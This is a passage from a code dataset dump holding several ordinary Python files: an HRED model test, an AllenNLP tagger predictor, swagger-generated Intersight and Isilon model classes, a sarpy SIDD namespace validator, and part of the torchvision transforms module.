'/tensorboard_test')\n\tos.mkdir(cwd + '/model_test')\n\tos.mkdir(cwd + '/cache_test')\n\ndef teardown_function(function):\n\tshutil.rmtree(cwd + '/output_test')\n\tshutil.rmtree(cwd + '/tensorboard_test')\n\tshutil.rmtree(cwd + '/model_test')\n\tshutil.rmtree(cwd + '/cache_test')\n\ndef modify_args(args):\n\targs.cuda = False\n\targs.restore = None\n\targs.wvclass = 'Glove'\n\targs.wvpath = path + '/tests/wordvector/dummy_glove/300d'\n\targs.embedding_size=300 #must be the same as the dim of wvpath\n\targs.out_dir = cwd + '/output_test'\n\targs.log_dir = cwd + '/tensorboard_test'\n\targs.model_dir = cwd + '/model_test'\n\targs.cache_dir = cwd + '/cache_test'\n\n\targs.name = 'test_hred_tensorflow'\n\targs.epochs = 1\n\targs.checkpoint_steps = 1\n\targs.datapath = path + '/tests/dataloader/dummy_ubuntucorpus#Ubuntu'\n\ndef test_train(mocker):\n\tdef side_effect_train(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'train'\n\t\tmain(args)\n\tdef side_effect_restore(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'train'\n\t\targs.restore = 'last'\n\t\tmain(args)\n\tdef side_effect_cache(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'train'\n\t\targs.cache = True\n\t\tmain(args)\n\tmock = mocker.patch('main.main', side_effect=side_effect_train)\n\trun()\n\ttf.reset_default_graph()\n\tmock.side_effect = side_effect_restore\n\trun()\n\ttf.reset_default_graph()\n\tmock.side_effect = side_effect_cache\n\trun()\n\ttf.reset_default_graph()\n\ndef test_test(mocker):\n\tdef side_effect_test(args):\n\t\tmodify_args(args)\n\t\targs.mode = 'test'\n\t\tmain(args)\n\tmock = mocker.patch('main.main', side_effect=side_effect_test)\n\trun()\n\told_res = json.load(open(\"./result.json\", \"r\"))\n\ttf.reset_default_graph()\n\trun()\n\tnew_res = json.load(open(\"./result.json\", \"r\"))\n\tfor key in old_res:\n\t\tif key[-9:] == 'hashvalue':\n\t\t\tassert old_res[key] == new_res[key]\n\ttf.reset_default_graph()\n"} {"ext": "py", "sha": "1a308d2eb8235c1bc63463b8113b70194885403a", "content": "from overrides import overrides\n\nfrom allennlp.common.util import JsonDict\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.data.tokenizers import WordTokenizer\nfrom allennlp.models import Model\nfrom allennlp.service.predictors.predictor import Predictor\n\n\n@Predictor.register('simple-tagger')\nclass SimpleTaggerPredictor(Predictor):\n \"\"\"\n Wrapper for the :class:`~allennlp.models.bidaf.SimpleTagger` model.\n \"\"\"\n def __init__(self, model: Model, dataset_reader: DatasetReader) -> None:\n super(SimpleTaggerPredictor, self).__init__(model, dataset_reader)\n self._tokenizer = WordTokenizer()\n\n @overrides\n def _json_to_instance(self, json: JsonDict) -> Instance:\n \"\"\"\n Expects JSON that looks like ``{\"sentence\": \"...\"}``\n and returns JSON that looks like\n ``{\"tags\": [...], \"class_probabilities\": [[...], ..., [...]]}``\n \"\"\"\n sentence = json[\"sentence\"]\n tokens, _ = self._tokenizer.tokenize(sentence)\n return self._dataset_reader.text_to_instance(tokens)\n"} {"ext": "py", "sha": "1a308ea479edb3858ce003e0ab30bf31df5b85c1", "content": "# coding: utf-8\n\n\"\"\"\n Intersight REST API\n\n This is Intersight REST API \n\n OpenAPI spec version: 1.0.9-961\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass TaskWorkflowActionRef(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'moid': 'str',\n 'object_type': 'str',\n 'selector': 'str'\n }\n\n attribute_map = {\n 'moid': 'Moid',\n 'object_type': 'ObjectType',\n 'selector': 'Selector'\n }\n\n def __init__(self, moid=None, object_type=None, selector=None):\n \"\"\"\n TaskWorkflowActionRef - a model defined in Swagger\n \"\"\"\n\n self._moid = None\n self._object_type = None\n self._selector = None\n\n if moid is not None:\n self.moid = moid\n if object_type is not None:\n self.object_type = object_type\n if selector is not None:\n self.selector = selector\n\n @property\n def moid(self):\n \"\"\"\n Gets the moid of this TaskWorkflowActionRef.\n The Moid of the referenced REST resource. \n\n :return: The moid of this TaskWorkflowActionRef.\n :rtype: str\n \"\"\"\n return self._moid\n\n @moid.setter\n def moid(self, moid):\n \"\"\"\n Sets the moid of this TaskWorkflowActionRef.\n The Moid of the referenced REST resource. \n\n :param moid: The moid of this TaskWorkflowActionRef.\n :type: str\n \"\"\"\n\n self._moid = moid\n\n @property\n def object_type(self):\n \"\"\"\n Gets the object_type of this TaskWorkflowActionRef.\n The Object Type of the referenced REST resource. \n\n :return: The object_type of this TaskWorkflowActionRef.\n :rtype: str\n \"\"\"\n return self._object_type\n\n @object_type.setter\n def object_type(self, object_type):\n \"\"\"\n Sets the object_type of this TaskWorkflowActionRef.\n The Object Type of the referenced REST resource. \n\n :param object_type: The object_type of this TaskWorkflowActionRef.\n :type: str\n \"\"\"\n\n self._object_type = object_type\n\n @property\n def selector(self):\n \"\"\"\n Gets the selector of this TaskWorkflowActionRef.\n An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. \n\n :return: The selector of this TaskWorkflowActionRef.\n :rtype: str\n \"\"\"\n return self._selector\n\n @selector.setter\n def selector(self, selector):\n \"\"\"\n Sets the selector of this TaskWorkflowActionRef.\n An OData $filter expression which describes the REST resource to be referenced. This field may be set instead of 'moid' by clients. If 'moid' is set this field is ignored. If 'selector' is set and 'moid' is empty/absent from the request, Intersight will determine the Moid of the resource matching the filter expression and populate it in the MoRef that is part of the object instance being inserted/updated to fulfill the REST request. An error is returned if the filter matches zero or more than one REST resource. An example filter string is: Serial eq '3AA8B7T11'. \n\n :param selector: The selector of this TaskWorkflowActionRef.\n :type: str\n \"\"\"\n\n self._selector = selector\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n if not isinstance(other, TaskWorkflowActionRef):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a308ef468987d1e48ff90d4af4109147de63be1", "content": "# coding: utf-8\n\n\"\"\"\n Isilon SDK\n\n Isilon SDK - Language bindings for the OneFS API # noqa: E501\n\n OpenAPI spec version: 9\n Contact: sdk@isilon.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom isi_sdk_8_2_2.models.node_state_servicelight_extended import NodeStateServicelightExtended # noqa: F401,E501\n\n\nclass NodeStateNodeServicelight(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'enabled': 'bool',\n 'present': 'bool',\n 'supported': 'bool',\n 'valid': 'bool'\n }\n\n attribute_map = {\n 'enabled': 'enabled',\n 'present': 'present',\n 'supported': 'supported',\n 'valid': 'valid'\n }\n\n def __init__(self, enabled=None, present=None, supported=None, valid=None): # noqa: E501\n \"\"\"NodeStateNodeServicelight - a model defined in Swagger\"\"\" # noqa: E501\n\n self._enabled = None\n self._present = None\n self._supported = None\n self._valid = None\n self.discriminator = None\n\n self.enabled = enabled\n if present is not None:\n self.present = present\n if supported is not None:\n self.supported = supported\n if valid is not None:\n self.valid = valid\n\n @property\n def enabled(self):\n \"\"\"Gets the enabled of this NodeStateNodeServicelight. # noqa: E501\n\n The node service light state (True = on). # noqa: E501\n\n :return: The enabled of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._enabled\n\n @enabled.setter\n def enabled(self, enabled):\n \"\"\"Sets the enabled of this NodeStateNodeServicelight.\n\n The node service light state (True = on). # noqa: E501\n\n :param enabled: The enabled of this NodeStateNodeServicelight. # noqa: E501\n :type: bool\n \"\"\"\n if enabled is None:\n raise ValueError(\"Invalid value for `enabled`, must not be `None`\") # noqa: E501\n\n self._enabled = enabled\n\n @property\n def present(self):\n \"\"\"Gets the present of this NodeStateNodeServicelight. # noqa: E501\n\n This node has a service light. # noqa: E501\n\n :return: The present of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._present\n\n @present.setter\n def present(self, present):\n \"\"\"Sets the present of this NodeStateNodeServicelight.\n\n This node has a service light. # noqa: E501\n\n :param present: The present of this NodeStateNodeServicelight. # noqa: E501\n :type: bool\n \"\"\"\n\n self._present = present\n\n @property\n def supported(self):\n \"\"\"Gets the supported of this NodeStateNodeServicelight. # noqa: E501\n\n This node supports a service light. # noqa: E501\n\n :return: The supported of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._supported\n\n @supported.setter\n def supported(self, supported):\n \"\"\"Sets the supported of this NodeStateNodeServicelight.\n\n This node supports a service light. # noqa: E501\n\n :param supported: The supported of this NodeStateNodeServicelight. # noqa: E501\n :type: bool\n \"\"\"\n\n self._supported = supported\n\n @property\n def valid(self):\n \"\"\"Gets the valid of this NodeStateNodeServicelight. # noqa: E501\n\n The node service light state is valid (False = Error). # noqa: E501\n\n :return: The valid of this NodeStateNodeServicelight. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._valid\n\n @valid.setter\n def valid(self, valid):\n \"\"\"Sets the valid of this NodeStateNodeServicelight.\n\n The node service light state is valid (False = Error). # noqa: E501\n\n :param valid: The valid of this NodeStateNodeServicelight. # noqa: E501\n :type: bool\n \"\"\"\n\n self._valid = valid\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, NodeStateNodeServicelight):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a308f2c8f1db82442861d3d91dbcaec7ed42ecc", "content": "__classification__ = 'UNCLASSIFIED'\n__author__ = \"Thomas McCullough\"\n\nimport os\nimport re\nimport logging\nfrom typing import List\n\n\nlogger = logging.getLogger('validation')\n\n_the_directory = os.path.split(__file__)[0]\nurn_mapping = {\n 'urn:SIDD:1.0.0': {\n 'ism_urn': 'urn:us:gov:ic:ism',\n 'sfa_urn': 'urn:SFA:1.2.0',\n 'sicommon_urn': 'urn:SICommon:0.1',\n 'version': '1.0',\n 'release': '1.0.0',\n 'date': '2011-08-31T00:00:00Z',\n 'schema': os.path.join(_the_directory, 'version1', 'SIDD_schema_V1.0.0_2011_08_31.xsd')},\n 'urn:SIDD:2.0.0': {\n 'ism_urn': 'urn:us:gov:ic:ism:13',\n 'sfa_urn': 'urn:SFA:1.2.0',\n 'sicommon_urn': 'urn:SICommon:1.0',\n 'version': '2.0',\n 'release': '2.0.0',\n 'date': '2019-05-31T00:00:00Z',\n 'schema': os.path.join(_the_directory, 'version2', 'SIDD_schema_V2.0.0_2019_05_31.xsd')},\n}\n_SIDD_SPECIFICATION_IDENTIFIER = 'SIDD Volume 1 Design & Implementation Description Document'\n\n\ndef get_specification_identifier():\n \"\"\"\n Get the SIDD specification identifier string.\n\n Returns\n -------\n str\n \"\"\"\n\n return _SIDD_SPECIFICATION_IDENTIFIER\n\n\ndef check_urn(urn_string):\n \"\"\"\n Checks that the urn string follows the correct pattern. This raises an\n exception for a poorly formed or unmapped SIDD urn.\n\n Parameters\n ----------\n urn_string : str\n \"\"\"\n\n if not isinstance(urn_string, str):\n raise TypeError(\n 'Expected a urn input of string type, got type {}'.format(type(urn_string)))\n\n the_match = re.match(r'^urn:SIDD:\\d.\\d.\\d$', urn_string)\n if the_match is None:\n raise ValueError(\n 'Input provided as `{}`,\\nbut should be of the form '\n '`urn:SIDD:..'.format(urn_string))\n\n\ndef get_urn_details(urn_string):\n \"\"\"\n Gets the associated details for the given SIDD urn, or raise an exception for\n poorly formatted or unrecognized urn.\n\n Parameters\n ----------\n urn_string\n\n Returns\n -------\n dict\n \"\"\"\n\n check_urn(urn_string)\n out = urn_mapping.get(urn_string, None)\n\n if out is None:\n raise KeyError(\n 'Got correctly formatted, but unmapped SIDD urn {}.'.format(urn_string))\n return out\n\n\ndef get_schema_path(the_urn):\n \"\"\"\n Gets the path to the proper schema file for the given SIDD urn.\n\n Parameters\n ----------\n the_urn : str\n\n Returns\n -------\n str\n \"\"\"\n\n result = get_urn_details(the_urn)\n return result['schema']\n\n\ndef get_versions():\n \"\"\"\n Gets a list of recognized SIDD urn.\n\n Returns\n -------\n List[str]\n \"\"\"\n\n return list(sorted(urn_mapping.keys()))\n\n\ndef validate_xml_ns(xml_ns, ns_key='default'):\n \"\"\"\n Validate the parsed SIDD xml namespace dictionary. This is expected to\n accompany the use of :func:`sarpy.io.general.utils.parse_xml_from_string`.\n\n Parameters\n ----------\n xml_ns : dict\n The xml namespace dictionary.\n ns_key : str\n The main SIDD element or default namespace.\n\n Returns\n -------\n bool\n \"\"\"\n\n def validate_ism_urn():\n if 'ism' not in xml_ns:\n the_val = None\n for key in xml_ns:\n val = xml_ns[key]\n if val.lower().startswith('urn:us:gov:ic:ism'):\n the_val = val\n xml_ns['ism'] = the_val\n\n valid = True\n if 'ism' not in xml_ns:\n logger.error('SIDD: No `ism` namespace defined.')\n valid = False\n elif xml_ns['ism'] != details['ism_urn']:\n logger.error(\n 'SIDD: SIDD {} `ISM` namespace urn is expected to be \"{}\", but we got \"{}\".\\n\\t'\n 'Differences in standard may lead to deserialization and/or '\n 'validation errors.'.format(sidd_urn, details['ism_urn'], xml_ns['ism']))\n valid = False\n return valid\n\n def validate_sfa_urn():\n if 'sfa' not in xml_ns:\n the_val = None\n for key in xml_ns:\n val = xml_ns[key]\n if val.lower().startswith('urn:sfa:'):\n the_val = val\n xml_ns['sfa'] = the_val\n\n valid = True\n if 'ism' not in xml_ns:\n logger.error('SIDD: No `sfa` namespace defined.')\n valid = False\n elif xml_ns['sfa'] != details['sfa_urn']:\n logger.error(\n 'SIDD: SIDD {} `SFA` namespace urn is expected to be \"{}\", but we got \"{}\".\\n\\t'\n 'Differences in standard may lead to deserialization and/or '\n 'validation errors.'.format(sidd_urn, details['sfa_urn'], xml_ns['sfa']))\n valid = False\n return valid\n\n def validate_sicommon_urn():\n if 'sicommon' not in xml_ns:\n the_val = None\n for key in xml_ns:\n val = xml_ns[key]\n if val.lower().startswith('urn:sicommon:'):\n the_val = val\n xml_ns['sicommon'] = the_val\n\n valid = True\n if 'sicommon' not in xml_ns:\n logger.error('SIDD: No `sicommon` namespace defined.')\n valid = False\n elif xml_ns['sicommon'] != details['sicommon_urn']:\n logger.error(\n 'SIDD: SIDD {} `SICommon` namespace urn is expected to be \"{}\", but we got \"{}\".\\n\\t'\n 'Differences in standard may lead to deserialization and/or '\n 'validation errors.'.format(sidd_urn, details['sicommon_urn'], xml_ns['sicommon']))\n valid = False\n return valid\n\n if not isinstance(xml_ns, dict):\n return ValueError('xml_ns must be a dictionary for SIDD interpretation.')\n\n if ns_key not in xml_ns:\n raise ValueError('ns_key must be a key in xml_ns.')\n\n sidd_urn = xml_ns[ns_key]\n\n try:\n details = get_urn_details(sidd_urn)\n except KeyError:\n logger.error('Got unmapped sidd urn `{}`'.format(sidd_urn))\n return False\n\n valid_ns = validate_ism_urn()\n valid_ns &= validate_sfa_urn()\n valid_ns &= validate_sicommon_urn()\n return valid_ns\n"} {"ext": "py", "sha": "1a308f4a7efa9513d5ce696d558fa62e035aa5ef", "content": "import math\nimport numbers\nimport random\nimport warnings\nfrom collections.abc import Sequence\nfrom typing import Tuple, List, Optional\n\nimport torch\nfrom torch import Tensor\n\ntry:\n import accimage\nexcept ImportError:\n accimage = None\n\nfrom . import functional as F\nfrom .functional import InterpolationMode, _interpolation_modes_from_int\n\n\n__all__ = [\"Compose\", \"ToTensor\", \"PILToTensor\", \"ConvertImageDtype\", \"ToPILImage\", \"Normalize\", \"Resize\", \"Scale\",\n \"CenterCrop\", \"Pad\", \"Lambda\", \"RandomApply\", \"RandomChoice\", \"RandomOrder\", \"RandomCrop\",\n \"RandomHorizontalFlip\", \"RandomVerticalFlip\", \"RandomResizedCrop\", \"RandomSizedCrop\", \"FiveCrop\", \"TenCrop\",\n \"LinearTransformation\", \"ColorJitter\", \"RandomRotation\", \"RandomAffine\", \"Grayscale\", \"RandomGrayscale\",\n \"RandomPerspective\", \"RandomErasing\", \"GaussianBlur\", \"InterpolationMode\", \"RandomInvert\", \"RandomPosterize\",\n \"RandomSolarize\", \"RandomAdjustSharpness\", \"RandomAutocontrast\", \"RandomEqualize\"]\n\n\nclass Compose:\n \"\"\"Composes several transforms together. This transform does not support torchscript.\n Please, see the note below.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n\n .. note::\n In order to script the transformations, please use ``torch.nn.Sequential`` as below.\n\n >>> transforms = torch.nn.Sequential(\n >>> transforms.CenterCrop(10),\n >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n >>> )\n >>> scripted_transforms = torch.jit.script(transforms)\n\n Make sure to use only scriptable transformations, i.e. that work with ``torch.Tensor``, does not require\n `lambda` functions or ``PIL.Image``.\n\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass ToTensor:\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor. This transform does not support torchscript.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0]\n if the PIL Image belongs to one of the modes (L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK, 1)\n or if the numpy.ndarray has dtype = np.uint8\n\n In the other cases, tensors are returned without scaling.\n\n .. note::\n Because the input image is scaled to [0.0, 1.0], this transformation should not be used when\n transforming target image masks. See the `references`_ for implementing the transforms for image masks.\n\n .. _references: https://github.com/pytorch/vision/tree/master/references/segmentation\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image or numpy.ndarray): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return F.to_tensor(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass PILToTensor:\n \"\"\"Convert a ``PIL Image`` to a tensor of the same type. This transform does not support torchscript.\n\n Converts a PIL Image (H x W x C) to a Tensor of shape (C x H x W).\n \"\"\"\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (PIL Image): Image to be converted to tensor.\n\n Returns:\n Tensor: Converted image.\n \"\"\"\n return F.pil_to_tensor(pic)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass ConvertImageDtype(torch.nn.Module):\n \"\"\"Convert a tensor image to the given ``dtype`` and scale the values accordingly\n This function does not support PIL Image.\n\n Args:\n dtype (torch.dtype): Desired data type of the output\n\n .. note::\n\n When converting from a smaller to a larger integer ``dtype`` the maximum values are **not** mapped exactly.\n If converted back and forth, this mismatch has no effect.\n\n Raises:\n RuntimeError: When trying to cast :class:`torch.float32` to :class:`torch.int32` or :class:`torch.int64` as\n well as for trying to cast :class:`torch.float64` to :class:`torch.int64`. These conversions might lead to\n overflow errors since the floating point ``dtype`` cannot store consecutive integers over the whole range\n of the integer ``dtype``.\n \"\"\"\n\n def __init__(self, dtype: torch.dtype) -> None:\n super().__init__()\n self.dtype = dtype\n\n def forward(self, image):\n return F.convert_image_dtype(image, self.dtype)\n\n\nclass ToPILImage:\n \"\"\"Convert a tensor or an ndarray to PIL Image. This transform does not support torchscript.\n\n Converts a torch.*Tensor of shape C x H x W or a numpy ndarray of shape\n H x W x C to a PIL Image while preserving the value range.\n\n Args:\n mode (`PIL.Image mode`_): color space and pixel depth of input data (optional).\n If ``mode`` is ``None`` (default) there are some assumptions made about the input data:\n - If the input has 4 channels, the ``mode`` is assumed to be ``RGBA``.\n - If the input has 3 channels, the ``mode`` is assumed to be ``RGB``.\n - If the input has 2 channels, the ``mode`` is assumed to be ``LA``.\n - If the input has 1 channel, the ``mode`` is determined by the data type (i.e ``int``, ``float``,\n ``short``).\n\n .. _PIL.Image mode: https://pillow.readthedocs.io/en/latest/handbook/concepts.html#concept-modes\n \"\"\"\n def __init__(self, mode=None):\n self.mode = mode\n\n def __call__(self, pic):\n \"\"\"\n Args:\n pic (Tensor or numpy.ndarray): Image to be converted to PIL Image.\n\n Returns:\n PIL Image: Image converted to PIL Image.\n\n \"\"\"\n return F.to_pil_image(pic, self.mode)\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n if self.mode is not None:\n format_string += 'mode={0}'.format(self.mode)\n format_string += ')'\n return format_string\n\n\nclass Normalize(torch.nn.Module):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n This transform does not support PIL Image.\n Given mean: ``(mean[1],...,mean[n])`` and std: ``(std[1],..,std[n])`` for ``n``\n channels, this transform will normalize each channel of the input\n ``torch.*Tensor`` i.e.,\n ``output[channel] = (input[channel] - mean[channel]) / std[channel]``\n\n .. note::\n This transform acts out of place, i.e., it does not mutate the input tensor.\n\n Args:\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channel.\n inplace(bool,optional): Bool to make this operation in-place.\n\n \"\"\"\n\n def __init__(self, mean, std, inplace=False):\n super().__init__()\n self.mean = mean\n self.std = std\n self.inplace = inplace\n\n def forward(self, tensor: Tensor) -> Tensor:\n \"\"\"\n Args:\n tensor (Tensor): Tensor image to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n return F.normalize(tensor, self.mean, self.std, self.inplace)\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\nclass Resize(torch.nn.Module):\n \"\"\"Resize the input image to the given size.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n size (sequence or int): Desired output size. If size is a sequence like\n (h, w), output size will be matched to this. If size is an int,\n smaller edge of the image will be matched to this number.\n i.e, if height > width, then image will be rescaled to\n (size * height / width, size).\n In torchscript mode size as single int is not supported, use a sequence of length 1: ``[size, ]``.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.BILINEAR``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` and\n ``InterpolationMode.BICUBIC`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n\n \"\"\"\n\n def __init__(self, size, interpolation=InterpolationMode.BILINEAR):\n super().__init__()\n if not isinstance(size, (int, Sequence)):\n raise TypeError(\"Size should be int or sequence. Got {}\".format(type(size)))\n if isinstance(size, Sequence) and len(size) not in (1, 2):\n raise ValueError(\"If size is a sequence, it should have 1 or 2 values\")\n self.size = size\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.interpolation = interpolation\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be scaled.\n\n Returns:\n PIL Image or Tensor: Rescaled image.\n \"\"\"\n return F.resize(img, self.size, self.interpolation)\n\n def __repr__(self):\n interpolate_str = self.interpolation.value\n return self.__class__.__name__ + '(size={0}, interpolation={1})'.format(self.size, interpolate_str)\n\n\nclass Scale(Resize):\n \"\"\"\n Note: This transform is deprecated in favor of Resize.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"The use of the transforms.Scale transform is deprecated, \" +\n \"please use transforms.Resize instead.\")\n super(Scale, self).__init__(*args, **kwargs)\n\n\nclass CenterCrop(torch.nn.Module):\n \"\"\"Crops the given image at the center.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made. If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n \"\"\"\n\n def __init__(self, size):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n PIL Image or Tensor: Cropped image.\n \"\"\"\n return F.center_crop(img, self.size)\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0})'.format(self.size)\n\n\nclass Pad(torch.nn.Module):\n \"\"\"Pad the given image on all sides with the given \"pad\" value.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n padding (int or sequence): Padding on each border. If a single int is provided this\n is used to pad all borders. If sequence of length 2 is provided this is the padding\n on left/right and top/bottom respectively. If a sequence of length 4 is provided\n this is the padding for the left, top, right and bottom borders respectively.\n In torchscript mode padding as single int is not supported, use a sequence of length 1: ``[padding, ]``.\n fill (number or str or tuple): Pixel fill value for constant fill. Default is 0. If a tuple of\n length 3, it is used to fill R, G, B channels respectively.\n This value is only used when the padding_mode is constant.\n Only number is supported for torch Tensor.\n Only int or str or tuple value is supported for PIL Image.\n padding_mode (str): Type of padding. Should be: constant, edge, reflect or symmetric.\n Default is constant.\n\n - constant: pads with a constant value, this value is specified with fill\n\n - edge: pads with the last value at the edge of the image\n\n - reflect: pads with reflection of image without repeating the last value on the edge\n\n For example, padding [1, 2, 3, 4] with 2 elements on both sides in reflect mode\n will result in [3, 2, 1, 2, 3, 4, 3, 2]\n\n - symmetric: pads with reflection of image repeating the last value on the edge\n\n For example, padding [1, 2, 3, 4] with 2 elements on both sides in symmetric mode\n will result in [2, 1, 1, 2, 3, 4, 4, 3]\n \"\"\"\n\n def __init__(self, padding, fill=0, padding_mode=\"constant\"):\n super().__init__()\n if not isinstance(padding, (numbers.Number, tuple, list)):\n raise TypeError(\"Got inappropriate padding arg\")\n\n if not isinstance(fill, (numbers.Number, str, tuple)):\n raise TypeError(\"Got inappropriate fill arg\")\n\n if padding_mode not in [\"constant\", \"edge\", \"reflect\", \"symmetric\"]:\n raise ValueError(\"Padding mode should be either constant, edge, reflect or symmetric\")\n\n if isinstance(padding, Sequence) and len(padding) not in [1, 2, 4]:\n raise ValueError(\"Padding must be an int or a 1, 2, or 4 element tuple, not a \" +\n \"{} element tuple\".format(len(padding)))\n\n self.padding = padding\n self.fill = fill\n self.padding_mode = padding_mode\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be padded.\n\n Returns:\n PIL Image or Tensor: Padded image.\n \"\"\"\n return F.pad(img, self.padding, self.fill, self.padding_mode)\n\n def __repr__(self):\n return self.__class__.__name__ + '(padding={0}, fill={1}, padding_mode={2})'.\\\n format(self.padding, self.fill, self.padding_mode)\n\n\nclass Lambda:\n \"\"\"Apply a user-defined lambda as a transform. This transform does not support torchscript.\n\n Args:\n lambd (function): Lambda/function to be used for transform.\n \"\"\"\n\n def __init__(self, lambd):\n if not callable(lambd):\n raise TypeError(\"Argument lambd should be callable, got {}\".format(repr(type(lambd).__name__)))\n self.lambd = lambd\n\n def __call__(self, img):\n return 